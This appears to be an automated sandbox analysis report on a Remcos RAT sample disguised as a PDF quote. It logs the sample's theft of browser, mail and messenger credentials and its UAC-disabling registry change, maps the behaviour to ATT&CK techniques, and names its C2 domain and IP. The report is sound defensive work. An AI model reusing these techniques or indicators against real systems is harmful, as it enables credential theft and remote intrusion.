            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4D\A$c
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000002.2588286581.0000000006098000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
            Source: Fatherhoods.exe, 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerkuhxZ$Z
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C22933 cpuid 7_2_22C22933
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 7_2_22C22264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_22C22264
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,18_2_004082CD
            Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Fatherhoods.exe PID: 8112, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: ESMTPPassword18_2_004033F0
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword18_2_00402DB3
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword18_2_00402DB3
            Source: Yara matchFile source: Process Memory Space: Fatherhoods.exe PID: 8112, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Fatherhoods.exe PID: 7376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Fatherhoods.exe PID: 5456, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-7CSH4DJump to behavior
            Source: Yara matchFile source: 00000007.00000002.2588286581.0000000006120000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2588286581.00000000060FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2588286581.0000000006131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Fatherhoods.exe PID: 8112, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exeCode function: 18_2_0042DE27 RpcBindingCreateW,18_2_0042DE27
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts11
            Native API
            11
            Registry Run Keys / Startup Folder
            1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            11
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts112
            Command and Scripting Interpreter
            Logon Script (Windows)212
            Process Injection
            2
            Obfuscated Files or Information
            2
            Credentials in Registry
            3
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell
            Login Hook11
            Registry Run Keys / Startup Folder
            2
            Software Packing
            1
            Credentials In Files
            139
            System Information Discovery
            Distributed Component Object Model11
            Input Capture
            1
            Remote Access Software
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets241
            Security Software Discovery
            SSH2
            Clipboard Data
            2
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Masquerading
            Cached Domain Credentials51
            Virtualization/Sandbox Evasion
            VNCGUI Input Capture213
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Modify Registry
            DCSync4
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job51
            Virtualization/Sandbox Evasion
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Access Token Manipulation
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
            Process Injection
            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1472083 Sample: RFQ24060084#U00b7pdf.exe Startdate: 12/07/2024 Architecture: WINDOWS Score: 100 60 a458386d9.duckdns.org 2->60 62 geoplugin.net 2->62 64 2 other IPs or domains 2->64 80 Multi AV Scanner detection for domain / URL 2->80 82 Found malware configuration 2->82 84 Multi AV Scanner detection for submitted file 2->84 88 8 other signatures 2->88 10 RFQ24060084#U00b7pdf.exe 33 2->10         started        14 svchost.exe 1 1 2->14         started        signatures3 86 Uses dynamic DNS services 60->86 process4 dnsIp5 52 C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32 10->52 dropped 54 C:\Users\user\AppData\Local\...\UserInfo.dll, PE32 10->54 dropped 56 C:\Users\user\AppData\Local\...\BgImage.dll, PE32 10->56 dropped 58 C:\Users\user\AppData\...behaviorgraphyldigheden146.Aga, ASCII 10->58 dropped 100 Suspicious powershell command line found 10->100 17 powershell.exe 20 10->17         started        72 127.0.0.1 unknown unknown 14->72 file6 signatures7 process8 file9 46 C:\Users\user\AppData\...\Fatherhoods.exe, PE32 17->46 dropped 48 C:\Users\...\Fatherhoods.exe:Zone.Identifier, ASCII 17->48 dropped 74 Writes to foreign memory regions 17->74 76 Found suspicious powershell code related to unpacking or dynamic code loading 17->76 78 Powershell drops PE file 17->78 21 Fatherhoods.exe 5 17 17->21         started        26 conhost.exe 17->26         started        signatures10 process11 dnsIp12 66 a458386d9.duckdns.org 217.76.50.73, 3256, 49713, 49716 SVNET-SE-ASSverigeNetMedianetworkiHalmstadABSE Sweden 21->66 68 drive.google.com 142.250.186.110, 443, 49711 GOOGLEUS United States 21->68 70 2 other IPs or domains 21->70 50 C:\ProgramData\remcos\logs.dat, data 21->50 dropped 92 Multi AV Scanner detection for dropped file 21->92 94 Detected unpacking (changes PE section rights) 21->94 96 Detected Remcos RAT 21->96 98 6 other signatures 21->98 28 cmd.exe 1 21->28         started        31 Fatherhoods.exe 1 21->31         started        33 Fatherhoods.exe 21->33         started        35 5 other processes 21->35 file13 signatures14 process15 signatures16 102 Uses cmd line tools excessively to alter registry or file data 28->102 37 reg.exe 1 28->37         started        40 conhost.exe 28->40         started        104 Tries to steal Instant Messenger accounts or passwords 31->104 106 Tries to steal Mail credentials (via file / registry access) 31->106 108 Tries to harvest and steal browser information (history, passwords, etc) 35->108 42 conhost.exe 35->42         started        44 reg.exe 1 1 35->44         started        process17 signatures18 90 Disables UAC (registry) 37->90

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.